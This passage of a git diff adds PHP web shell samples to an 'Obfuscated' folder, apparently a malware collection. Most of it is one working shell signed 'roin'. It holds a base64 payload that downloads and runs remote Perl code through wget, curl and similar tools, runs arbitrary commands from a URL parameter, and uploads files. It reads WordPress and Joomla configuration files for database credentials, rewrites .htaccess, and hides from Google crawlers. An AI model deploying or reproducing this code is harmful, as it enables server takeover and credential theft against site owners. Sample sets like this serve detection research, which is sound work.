+3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglA + +c3lzdGVtKCdHRVQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgncm0gLXJmIHJvYioudHh0Jyk7DQoJQHN5c3RlbSgnY2QgL3RtcDt3Z2V0ICc + +uJHVybC4nIC1PIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO2N1cmwgJy4kdXJsLicgLW8gcm9ib3QudHh0O3Blcmwgcm9ib3 + +QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2NkIC90bXA7bHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtyb + +SAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO2x5bnggLXNvdXJjZSAnLiR1cmwuJyA + ++IHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO2ZldGNoIC1vIHJvYm90LnR4dCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZX + +JsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdG1wO0dFVCAnLiR1cmwuJztwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdyb + +SAtcmYgcm9iKi50eHQnKTsNCglAc3lzdGVtKCdjZCAvdmFyL3RtcDtybSAtcmYgaW5kZXgucGhwLionKTsNCglAc3lzdGVtKCdjZCAvdG1wO3JtIC1yZiByb2IqLnR4dCcpOw0KCUBzeXN0ZW0oJ2NkIC90bXA7cm0gLXJm + +IHJvYioudHh0KicpOw0KfSBlbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsNCglAcGFzc3RocnUoJ3dnZXQgJy4kdXJsLicgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3J + +tIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnY3VybCAnLiR1cmwuJyAtbyByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdsd3AtZG + +93bmxvYWQgLWEgJy4kdXJsLicgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnbHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O + +3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnZmV0Y2ggLW8gcm9ib3QudHh0ICcuJHVybC4nIDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAt + +ZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ0dFVCAnLiR1cmwuJyA + ++cm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgncm0gLXJmIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdjZCAvdG1wO3dnZXQgJy4kdXJsLi + +cgLU8gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXNzdGhydSgnY2QgL3RtcDtjdXJsICcuJHVybC4nIC1vIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4d + +DtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ2NkIC90bXA7bHdwLWRvd25sb2FkIC1hICcuJHVybC4nIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAt + +ZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ2NkIC90bXA7bHlueCAtc291cmNlICcuJHVybC4nID4gcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3Blcmwgcm9ib3QudHh0O3JtIC1mciByb2IqLnR4dCcpOw0KCUBwYXN + +zdGhydSgnY2QgL3RtcDtmZXRjaCAtbyByb2JvdC50eHQgJy4kdXJsLic7cGVybCByb2JvdC50eHQ7cGVybCByb2JvdC50eHQ7cm0gLWZyIHJvYioudHh0Jyk7DQoJQHBhc3N0aHJ1KCdjZCAvdG1wO0dFVCAnLiR1cmwuJz + +twZXJsIHJvYm90LnR4dDtwZXJsIHJvYm90LnR4dDtybSAtZnIgcm9iKi50eHQnKTsNCglAcGFzc3RocnUoJ3JtIC1yZiBpbmRleC5waHAuKicpOw0KCUBwYXNzdGhydSgncm0gLXJmIHJvYioudHh0Jyk7DQoJQHBhc3N0a + +HJ1KCdybSAtcmYgcm9iKi50eHQqJyk7DQp9DQo/Pg=="; + $code2 = base64_decode($code); + $myfile = fopen("pl.php", "w+"); + fwrite($myfile, $code2); + fclose($myfile); + } + private function check($tipe) { + if ($tipe == "cmd") { + $result = 0; + if (function_exists('passthru')) { + $result = "passthru"; + } elseif (function_exists('system')) { + $result = "system"; + } elseif (function_exists('exec')) { + $result = "exec"; + } elseif (function_exists('shell_exec')) { + $result = "shell_exec"; + } + } else { + $result = "linux"; + if (PHP_OS == "WINNT") { + $result = "windows"; + } elseif (PHP_OS == "Linux") { + $result = "linux"; + } elseif (PHP_OS == "FreeBSD") { + $result = "freebsd"; + } + } + return $result; + } + private function getForm() { + $this->form(); + if (isset($_GET['start'])) { + echo "
Upload File

New name:
"; + $this->processForm(); + $this->cmd(); + } else { + $this->cmd(); + } + } + private function form() { + if (strpos(strtolower($_SERVER['HTTP_USER_AGENT']), 'google') !== false) { + header('HTTP/1.0 404 Not Found'); + echo "

Error 404 Not Found

"; + echo "The page that you have requested could not be found."; + exit(); + } + $safe = @ini_get('safe_mode'); + $secure = (!$safe) ? "SAFE_MODE : OFF roin" : "SAFE_MODE : ON roin"; + echo ""; + echo "Touched By roin
"; + echo "" . $secure . "
"; + $cur_user = "(" . $this->user . ")"; + echo "User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "
"; + echo "Uname : " . php_uname() . "
"; + } + private function processForm() { + if (isset($_POST['submit'])) { + $uploaddir = $this->pwd(); + if (!$name = $_POST['newname']) { + $name = $_FILES['userfile']['name']; + } + move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name); + echo (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) ? "!!Upload Failed" : "Success Upload to " . $uploaddir . $name; + } + } + private function pwd() { + $cwd = getcwd(); + if ($u = strrpos($cwd, '/')) { + return ($u != strlen($cwd) - 1) ? $cwd . '/' : $cwd; + } elseif ($u = strrpos($cwd, '/')) { + if ($u != strlen($cwd) - 1) { + return $cwd . '/'; + } else { + return $cwd; + } + } + } + private function cmd($cmd = false) { + if ($cmd) { + echo '
' . $this->exe($cmd) . '
'; + } else { + if (isset($_GET['q'])) { + echo '
' . $this->exe($_GET['q']) . '
'; + } else { + echo ($this->os == "windows") ? '
' . $this->exe('dir') . '
' : '
' . $this->exe('ls -la') . '
'; + } + } + } + private function exe($cmd) { + $res = ''; + if ($this->type == "exec") { + @exec($cmd, $res); + $res = join("n", $res); + } elseif ($this->type == "shell_exec") { + $res = @shell_exec($cmd); + } elseif ($this->type == "system") { + @ob_start(); + @system($cmd); + $res = @ob_get_contents(); + @ob_end_clean(); + } elseif ($this->type == "passthru") { + @ob_start(); + @passthru($cmd); + $res = @ob_get_contents(); + @ob_end_clean(); + } + return $res; + } + private function setPatch($user, $data, $lock, $path, $force) { + $create = 1; + if (!$force) { + if (in_array($user, $this->access)) { + $create = 0; + } + } + if ($create) { + if ($lock) { + $i = 'deny from all' . PHP_EOL; + } else { + $i = '' . PHP_EOL; + $i.= 'deny from all' . PHP_EOL; + $i.= '' . PHP_EOL; + } + if (is_array($data)) { + foreach ($data as $k) { + $i.= '' . PHP_EOL; + $i.= 'Order Allow,Deny' . PHP_EOL; + $i.= 'Allow from all' . PHP_EOL; + $i.= '' . PHP_EOL; + } + } else { + if (!empty($data)) { + $i.= '' . PHP_EOL; + $i.= 'Order Allow,Deny' . PHP_EOL; + $i.= 'Allow from all' . PHP_EOL; + $i.= '' . PHP_EOL; + } else { + $i.= '' . PHP_EOL; + $i.= 'Order Allow,Deny' . PHP_EOL; + $i.= 'Allow from all' . PHP_EOL; + $i.= '' . PHP_EOL; + $i.= '' . PHP_EOL; + $i.= 'Order Allow,Deny' . PHP_EOL; + $i.= 'Allow from all' . PHP_EOL; + $i.= '' . PHP_EOL; + } + } + if (is_array($path)) { + foreach ($path as $k) { + $file = fopen($k, "w"); + fwrite($file, $i); + fclose($file); + } + } else { + if (!empty($path)) { + $file = fopen($path, "w"); + fwrite($file, $i); + fclose($file); + } else { + $file = fopen(".htaccess", "w"); + fwrite($file, $i); + fclose($file); + } + } + } + } + private function setDB($file) { + $read = file_get_contents($file); + if ($read) { + echo $read; + } else { + echo "Unable to open file"; + } + exit; + } + private function setClone($path) { + if (file_exists($path)) { + @unlink($path); + } + $source = $_SERVER['SCRIPT_FILENAME']; + copy($source, $path); + } + private function joomlaDb() { + $p1 = "../../../../../../../"; + $p2 = "../../../../../../"; + $p3 = "../../../../../"; + $p4 = "../../../../"; + $p5 = "../../../"; + $p6 = "../../"; + $p7 = "../"; + $j = file_get_contents($p1 . "configuration.php"); + if (!$j) { + $j = file_get_contents($p2 . "configuration.php"); + if (!$j) { + $j = file_get_contents($p3 . "configuration.php"); + if (!$j) { + $j = file_get_contents($p4 . "configuration.php"); + if (!$j) { + $j = file_get_contents($p5 . "configuration.php"); + if (!$j) { + $j = file_get_contents($p6 . "configuration.php"); + if (!$j) { + $j = file_get_contents($p7 . "configuration.php"); + if (!$j) { + $j = file_get_contents("configuration.php"); + } + } + } + } + } + } + } + echo $j; + exit; + } + private function wpDb() { + $p1 = "../../../../../../../"; + $p2 = "../../../../../../"; + $p3 = "../../../../../"; + $p4 = "../../../../"; + $p5 = "../../../"; + $p6 = "../../"; + $p7 = "../"; + $w = file_get_contents($p1 . "wp-config.php"); + if (!$w) { + $w = file_get_contents($p2 . "wp-config.php"); + if (!$w) { + $w = file_get_contents($p3 . "wp-config.php"); + if (!$w) { + $w = file_get_contents($p4 . "wp-config.php"); + if (!$w) { + $w = file_get_contents($p5 . "wp-config.php"); + if (!$w) { + $w = file_get_contents($p6 . "wp-config.php"); + if (!$w) { + $w = file_get_contents($p7 . "wp-config.php"); + if (!$w) { + $w = file_get_contents("wp-config.php"); + } + } + } + } + } + } + } + echo $w; + exit; + } + private function delete($file) { + chmod("./", 0755); + chmod("../", 0755); + chmod("../../", 0755); + @unlink($this->pwd() . $file); + $this->exe('rm -rf ' . $file); + $this->exe('del ' . $file); + } +} +new roin(); +?> \ No newline at end of file diff --git a/Obfuscated/WebShell_0ba8e8b6c1334b8335a9a9374bfb1109c0371478.php b/Obfuscated/WebShell_0ba8e8b6c1334b8335a9a9374bfb1109c0371478.php new file mode 100644 index 0000000..d68a6bd --- /dev/null +++ b/Obfuscated/WebShell_0ba8e8b6c1334b8335a9a9374bfb1109c0371478.php @@ -0,0 +1,209 @@ + \ No newline at end of file diff --git a/Obfuscated/WebShell_25782c2ea1db14e0131e8bcbb3e11587d66478ef.php b/Obfuscated/WebShell_25782c2ea1db14e0131e8bcbb3e11587d66478ef.php new file mode 100644 index 0000000..2d88d63 --- /dev/null +++ b/Obfuscated/WebShell_25782c2ea1db14e0131e8bcbb3e11587d66478ef.php @@ -0,0 +1,65 @@ + \ No newline at end of file diff --git a/Obfuscated/WebShell_2d25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php b/Obfuscated/WebShell_2d25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php new file mode 100644 index 0000000..387fead --- /dev/null +++ b/Obfuscated/WebShell_2d25c1677517b0926bcd6fe0cbea03a9a9cc93bb.php @@ -0,0 +1,7 @@ + diff --git a/Obfuscated/WebShell_a679659c9efa3c899462f08c78755b1c04753f73.php b/Obfuscated/WebShell_a679659c9efa3c899462f08c78755b1c04753f73.php new file mode 100644 index 0000000..b5aabf9 --- /dev/null +++ b/Obfuscated/WebShell_a679659c9efa3c899462f08c78755b1c04753f73.php @@ -0,0 +1,3 @@ + \ No newline at end of file